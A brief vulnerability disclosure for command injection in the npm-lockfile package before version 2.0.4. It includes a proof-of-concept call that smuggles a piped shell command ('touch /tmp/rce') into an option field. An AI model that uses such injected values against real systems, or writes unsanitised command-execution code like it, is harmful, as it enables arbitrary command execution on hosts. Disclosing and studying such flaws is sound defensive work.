npm-lockfile before 2.0.4 does not santize unsafe external input and invoke sensitive command execution API with the input, causing command injection vulnerability.
// npm i [email protected]
const getLockfile = require('npm-lockfile/getLockfile');
getLockfile("./package-lock.json", "08/01/2022",{"only":"prod|touch /tmp/rce"}) // a file named rce will be created at /tmp
This vulnerability is capable of executing arbitrary command on the hosting operating system.